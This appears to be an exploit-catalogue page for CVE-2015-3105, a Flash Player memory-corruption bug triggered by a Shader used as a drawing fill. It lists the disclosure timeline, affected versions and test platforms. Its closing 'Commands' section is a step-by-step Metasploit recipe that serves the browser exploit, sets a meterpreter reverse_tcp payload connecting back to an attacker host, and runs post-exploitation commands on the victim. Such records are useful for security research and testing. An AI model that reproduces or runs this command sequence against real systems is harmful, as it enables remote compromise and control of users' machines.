CVE-2015-3105 Adobe Flash Player Drawing Fill Shader Memory Corruption

Timeline :

Vulnerability discovered and reported to the vendor by Chris Evans of Google Project Zero
Patch provided by the vendor via APSB15-11 on 2015-06-09
Vulnerability discovered being exploited in exploit kits on 2015-06-16
Metasploit PoC provided on 2015-06-25

PoC provided by :

Chris Evans
Unknown
juan vazquez

Reference(s) :

CVE-2015-3105
APSB15-11

Affected version(s) :

Adobe Flash Player 16.0.0.305 and earlier versions
Adobe Flash Player 11.2.202.442 and earlier 11.x versions

Tested on :

Windows 7 SP1 (64-bit), IE8 and Adobe Flash 17.0.0.188

Description :

This module exploits a memory corruption that occurs when a Shader is applied as a drawing fill, as exploited in the wild in June 2015. This module has been tested successfully on:

* Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188
* Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188
* Linux Mint "Rebecca" (32-bit), Firefox 33.0 and Adobe Flash 11.2.202.460

Commands :

use exploit/multi/browser/adobe_flash_shader_drawing_fill
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo